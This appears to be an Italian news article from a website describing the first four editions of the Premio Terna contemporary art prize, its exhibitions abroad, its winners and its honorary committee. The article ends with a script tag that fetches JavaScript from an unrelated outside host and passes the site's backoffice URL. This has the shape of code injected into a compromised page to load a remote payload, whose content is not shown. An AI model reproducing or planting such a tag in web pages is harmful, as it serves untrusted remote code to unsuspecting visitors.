1. Home
  2. Notizie e Mercato
  3. Premio Terna: le prime quattro edizioni

Premio Terna: le prime quattro edizioni

Energie rinnovabili di
5/5
votato da 1 persone
9.000 artisti coinvolti e 100.000 visitatori alle mostre organizzate in Italia, New York, Shanghai e Mosca a domistrazione del successo del Premio Terna e dell'l'eccellenza artistica contemporanea


Per Terna l’impegno culturale è l’impegno alla creazione di valore per il Paese. Su questa premessa l’Azienda, che possiede e gestisce la rete elettrica italiana di trasmissione dell’energia in Alta Tensione, ha lanciato nel 2008 il Premio Terna per l’Arte Contemporanea in collaborazione con il Ministero per i Beni e le Attività Culturali.

Terna ha invitato di anno in anno gli artisti a esprimere la propria creatività su un tema legato alla trasmissione dell’energia nell’arte, rielaborando simbolicamente la propria missione industriale al servizio della collettività con l’obiettivo di suggerire interpretazioni creative, trasversali, di impegno sociale e culturale. La valorizzazione del talento è alla base della forte partecipazione degli artisti che nelle prime quattro edizioni hanno iscritto circa 10.000 opere d’arte.

Già nelle prime edizioni il Premio si è affermato come punto di riferimento per gli artisti, dai big agli emergenti, e ha creato nuove sinergie tra aziende, mondo dell’arte, istituzioni, cultura ed economia. Sotto l’Alto Patronato dal Presidente della Repubblica e con il patrocinio di numerose e importanti istituzioni nazionali e locali, è diventato negli anni un privilegiato punto di osservazione sulla società creativa italiana e il principale progetto di collaborazione privato-pubblico sulla contemporaneità.

Le caratteristiche che hanno reso unico il Premio sono: l’accesso libero e gratuito per tutti, senza barriere all’ingresso, e il tema al quale gli artisti devono ispirarsi. Inoltre, l’utilizzo del web come unico canale di partecipazione, un montepremi tra i più alti in Europa, la creazione di un osservatorio permanente sul settore con indagini qualitative e quantitative a disposizione del pubblico.

La piattaforma online del Premio Terna, già visitata da oltre 8 milioni di utenti, è quindi un palcoscenico per gli artisti e le loro opere, che possono essere scoperti da curatori, gallerie e addetti ai lavori: la più grande raccolta in Italia di opere d’arte contemporanea, completa di curricula e profili degli artisti, una “vetrina intelligente” con gallerie virtuali, schede informative, fiere in 3d ed eventi social. Inoltre, il PtMag, quotidiano online di commento alle notizie più rilevanti del settore con interviste esclusive agli artisti e le puntate del primo docu-reality italiano con telecamere h24 ad accompagnare gli artisti vincitori della terza edizione a Mosca in occasione dell’esposizione al MaMM delle loro opere. Sono circa 170mila le persone iscritte alla newsletter.

Il Premio Terna è stato invitato, quale esempio di successo ed eccellenza imprenditoriale e culturale italiana, ad esporre a New York e successivamente a Shanghai rientrando nell’ambito delle iniziative organizzate dal nostro Paese per l’Expo 2010. Nell’anno della Cultura Italiana in Russia, il Premio è stato invitato ad esporre le opere degli artisti italiani presso uno dei più rilevanti centri di contemporanea del Paese.

Tra i vincitori delle passate edizioni spiccano nomi di rilievo della scena dell’arte contemporanea come Ettore Spalletti, Alberto Garutti e Luigi Ontani. Le giurie coinvolte, sempre internazionali ed eteroclite, hanno visto la partecipazione di registi, collezionisti, direttori di musei, scrittori, galleristi, editori, architetti, sempre attenti ai linguaggi della contemporaneità. L’organo di massima rappresentanza del Premio Terna, il Comitato d’Onore, è stato sempre presieduto dal Ministro per i Beni e le Attività Culturali e composto da figure istituzionali di elevato profilo. Luigi Abete, Presidente dell’ASSONIME, Giulio Anselmi, Presidente ANSA, Franco Bassanini, Presidente Cassa Depositi e Prestiti, Francesco Casetti, docente a YALE, Domenico De Masi, Sociologo e docente di sociologia del lavoro, Roberto Grossi, Presidente Federculture, Giuseppe Guazzetti, Presidente della Fondazione Cariplo, Fernanda Pivano, Carlo Malinconico Castriota Scanderbeg, Presidente della Federazione Italiana Editori Giornali, Marco Senaldi, Professore di Cinema e Arti Visive all'Università di Milano Bicocca, Federico Masini, Direttore Istituto Confucio, Massimiliano Fuksas, Architetto. Antonio Zanardi Landi, Ambasciatore d’Italia in Russia, Ilaria Borletti Buitoni, Presidente Fondo Ambiente Italiano, Bruno Cagli, Presidente Accademia Nazionale di Santa Cecilia, Vittorio Cogliati Dezza, Presidente Lagambiente, Franca Coin, Presidente Venice Foundation, Jakaranda Falk-Caracciolo, giornalista ed editore, Fulco Pratesi, Presidente Onorario WWF Italia, Maddalena Ragni, Direttore Generale del MiBAC per il paesaggio, le belle arti, l'architettura e l'arte contemporanee, Serena Vitale, scrittrice e docente di Slavistica all’Università Cattolica del Sacro Cuore di Milano.

www.premioterna.com


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2013-10-10&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.5449644401111049" type="text/javascript"></script>